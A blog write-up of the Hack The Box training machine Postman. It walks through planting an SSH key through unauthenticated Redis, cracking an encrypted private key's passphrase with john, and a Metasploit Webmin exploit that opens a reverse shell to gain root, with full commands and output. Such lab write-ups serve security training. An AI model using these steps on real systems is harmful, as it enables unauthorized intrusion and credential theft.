Post

Hack The Box Write-Up Postman - 10.10.10.160

A hacker does for love what others would not do for money.

Laura Creighton

About Postman

In this post, I’m writing a write-up for the machine Postman from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Postman is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Machine Info

hackthebox-postman-machine-info

hackthebox-postman-machine-ip-and-creator

Enumeration

Portscan (Nmap)

First, I start with a portscan with Nmap. My initial Nmap scan missed the 6379 port. So, I scanned the target again with the port range 1-10000.

1
~$ nmap -p 1-10000 -sC -sV -oA ./nmap/postman.txt 10.10.10.160

The results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Nmap scan report for 10.10.10.160                                                                                                                                                                     
Host is up (0.033s latency).                                                                                                                                                                             
Scanned at 2020-02-07 20:51:34 CET for 2957s                                                                                                                                                             
Not shown: 9965 closed ports                                                                                                                                                                             
PORT      STATE    SERVICE        VERSION                                                                                                                                                                
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                           
| ssh-hostkey:                                                                                                                                                                                           
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)                                                                                                                                           
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open     redis          Redis key-value store 4.0.9
10000/tcp open     http           MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version: 
|_  ERROR: Failed to get host information from server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  7 21:40:51 2020 -- 1 IP address (1 host up) scanned in 2958.40 seconds

There are three open ports:

  • 22/tcp (SSH)
  • 80/tcp (HTTP Apache Web Server)
  • 6379/tcp (Redis 4.0.9)
  • 10000/tcp (HTTP MiniServ 1.910)

Enumeration Web Server

I start enumerating the webserver and visited the website on http://10.10.10.160. I landed on a good looking web page from Cyber Geek. And it seems that I’m welcome.

hackthebox-postman-http-80.png

Looked through the website, but there are no usable pages. There is a username listed on the information bar at the bottom postman@htb. With wfuzz I have tried some wordlists, got some default folders, but nothing juicy. There is also a higher port open, let’s check the higher port.

Enumeration Webmin

I visited the following webpage: http://10.10.10.160:10000 and the is a message visible that we have to visit this website on HTTPS, so I changed the protocol and visited this page: https://10.10.10.160:10000/. And I have a login page.

hackthebox-postman-webadmin

Webmin on https://10.10.10.160:10000

There is also nothing here on this webpage. I need to have valid credentials to log in, but I still don’t have any credentials yet. Go to the next port 6397.

Enumerate Redis

As Redis 4.0.9 is installed on this box, it is vulnerable for Unauthenticated Code Execution. I searched on the internet for an exploit and comes up with this page: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html. I invoked this command below:

1
2
3
4
5
6
7
8
9
10
~$ telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.

This works, there is no authentication needed. Redis is unprotected installed without any password. Let’s exploit this vulnerability!

Exploitation

Unauthenticated code execution

I can write files to this box without any authentication. Let’s try to create a new SSH Key. I invoked this command below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /home/htb/boxes/machines/postman/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/htb/boxes/machines/postman/id_rsa.
Your public key has been saved in /home/htb/boxes/machines/postman/id_rsa.pub.
The key fingerprint is:
SHA256:ZGnXXxEXku0kHb5YIhcPsW4xC3W+WuVNrYY5w28dVh0 root@kali
The key's randomart image is:
+---[RSA 3072]----+
|             *=E=|
|         . ..oX+*|
|        = .o.*+=B|
|       + . .=+B**|
|        S   *=+*o|
|            .=+..|
|             .o .|
|             .   |
|                 |
+----[SHA256]-----+

I created this RSA key pair with no password. Now I’ve got the key. This key needs to put into the memory of this box. I need to convert this key to the RDB format. I copied the id_rsa.pub to a text file. I added "\n\n on the front line and \n\n" on the last line, the contents of this file are shown below:

1
"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohfe/NCMosZ9t/ClKT+PN0rcRUMk6SyUAAP/ODHBbfIJxB2UPbNANDZSZzOYZ+5p4Uhyoti0qPdD8p7mQdfriCI4HqVBEgOYCoVTLYZcvTEVMV01abTc92opLsocAiwX/0OTpfyQRwhUO3kKEPEPzT3AcijW/0wcjrdtHMd4YylFmLanQTaVB1xdMKXoLczu3KqdJYr0Q4sI6R81SvUcN718tkOeLfi+2e3tEa3XfmZxk7oGzj0s4KOYaKZ2DFhm0y8p85x0uAb9MKh3B8FeCpvwaAUzpSMGPCveqzhrM2b/XYba545ZycNfjGlkxW40QQHpT1no9Oqp7KqjvHK/3XYuiNzaZl1nsa+VSaSBk139pq+kfCf2kOjWMiMV/oW0fHjdE6ty9pA3y7t66JVBE= root@kali\n\n"

Now the id_rsa.txt is just our public key but with newlines. I copied the content of this file to my clipboard and created a telnet session and invoked the commands below to load this key in the memory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
~$ telnet 10.10.10.160 6379                             
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
set s-key "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohfe/NCMosZ9t/ClKT+PN0rcRUMk6SyUAAP/ODHBbfIJxB2UPbNANDZSZzOYZ+5p4Uhyoti0qPdD8p7mQdfriCI4HqVBEgOYCoVTLYZcvTEVMV01abTc92opLsocAiwX/0OTpfyQRwhUO3kKEPEPzT3AcijW/0wcjrdtHMd4YylFmLanQTaVB1xdMKXoLczu3KqdJYr0Q4sI6R81SvUcN718tkOeLfi+2e3tEa3XfmZxk7oGzj0s4KOYaKZ2DFhm0y8p85x0uAb9MKh3B8FeCpvwaAUzpSMGPCveqzhrM2b/XYba545ZycNfjGlkxW40QQHpT1no9Oqp7KqjvHK/3XYuiNzaZl1nsa+VSaSBk139pq+kfCf2kOjWMiMV/oW0fHjdE6ty9pA3y7t66JVBE= root@kali\n\n"
+OK
config set dir /var/lib/redis/.ssh                
+OK                                               
config set dbfilename authorized_keys             
+OK                                               
save                                              
+OK                                               
quit                                              
+OK                                               
Connection closed by foreign host.

Everything looks good. Now I try to create an SSH session to this box. If everything was configured properly, I get a session without filling in any credentials.

1
2
3
4
5
6
7
8
9
10
11
~$ ssh -i ./id_rsa  [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb  7 22:04:13 2020 from 10.10.14.183
redis@Postman:~$

I’m having now an SSH session as the user redis to this box!

1
2
3
4
5
redis@Postman:~$ whoami
redis
redis@Postman:~$ pwd
/var/lib/redis
redis@Postman:~$

Enumeration on user

I have an active session with this box. Let’s poke some around and let’s check if I can find the user.txt. There is a home folder for the user Matt. It seems that the user redis does not have access to open the user.txt file.

1
2
3
4
5
6
7
8
9
redis@Postman:~$ cd /home/
redis@Postman:/home$ ls
Matt
redis@Postman:/home$ cd Matt/
redis@Postman:/home/Matt$ ls
user.txt
redis@Postman:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
redis@Postman:/home/Matt$

It takes me some hours searching and poking around. It’s was driving me insane when it turned out I couldn’t find anything useful. After a little walk outside, I decided to put my previous boxes knowledge to the test and tried to use the grep command for searching for useful files. As grep is not working on this machine, I tried the find command. After some searching, I couldn’t believe my eyes! I just found a backup of a private key!

1
2
redis@Postman:/$ find . -name "id_rsa*" -print -quit
./opt/id_rsa.bak

This has to be the private key of the user Matt!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
redis@Postman:/opt$ cat id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

I copied the content to the file id_rsa.bak on my Kali machine and gave it to ssh2john:

1
2
~# python ssh2john.py id_rsa.bak 
id_rsa.bak:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb2867aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b50b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a024848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e414e20dc1510eb476a467f4e861a51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af761e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63

Placed this hash into ssh_password.txt and let john crack the passphrase:

1
2
3
4
5
6
7
8
9
10
~# john ssh_pssword.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)

That’s an easy password. Let’s try to create a connection with ssh. It turns out that Matt doesn’t have permission to access through SSH. After all those hours of work, this was just a disappointment for me and came hard. I had to get myself back under control, with a cup of coffee, before I could go on.

Get user.txt

I logged back in as regis. Maybe I can switch to Matt with the su Matth command. And it is possible to switch accounts and getting the user flag!

1
2
3
4
5
6
sudo: unable to initialize policy plugin
redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ cat /home/Matt/user.txt 
517ad0ec2458ca97af8d93aac08a2f3c
Matt@Postman:/var/lib/redis$

It’s still very exciting to grab the user flag.

Exploit Webdmin (Metasploit)

Now go on root! I feel like there’s been a horse in the living room for hours, and we haven’t done anything about it…. The name of the horse: Webadmin. I go back to the Webmin portal on https://10.10.10.160:10000 and logged in as Matt.

hackthebox-postman-webadmin-exploit

Matt has access to the Software Package Updates

Matt has access to the Software Package Updates and I found on the internet an article https://www.exploit-db.com/exploits/46984. There is a module in Metasploit available to exploit this vulnerability. I invoked this command: msfconsole and exploited Webmin and grabbed the root.txt flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 > use exploit/linux/http/web                                                                                                                                                                        
use exploit/linux/http/webcalendar_settings_exec  use exploit/linux/http/webid_converter            use exploit/linux/http/webmin_backdoor            use exploit/linux/http/webmin_packageup_rce        
msf5 > use exploit/linux/http/webmin_packageup_rce                                                                                                                                                       
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160                                                                                                                                  
rhosts => 10.10.10.160                                                                                                                                                                                   
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt                                                                                                                                        
username => Matt                                                                                                                                                                                         
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008                                                                                                                                
password => computer2008                                                                                                                                                                                 
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true                                                                                                                                             
ssl => true                                                                                                                                                                                              
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.15.62                                                                                                                                    
lhost => 10.10.15.62                                                                                                                                                                                     
msf5 exploit(linux/http/webmin_packageup_rce) > exploit                                                                                                                                                  
                                                                                                                                                                                                         
[*] Started reverse TCP handler on 10.10.15.62:4444                                                                                                                                                      
[+] Session cookie: af1882183da1a304a49faf5183463233                                                                                                                                                     
[*] Attempting to execute the payload...                                                                                                                                                                 
[*] Command shell session 1 opened (10.10.15.62:4444 -> 10.10.10.160:41504) at 2020-02-08 00:23:06 +0100                                                                                                                                                                                                                                                                shell                                                                                                                                                                                                                                                                                                                                                                                                           
[*] Trying to find binary(python) on target machine                                                                                                                                                      
[*] Found python at                                                                                                                                                                                      
[*] Using `python` to pop up an interactive shel
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.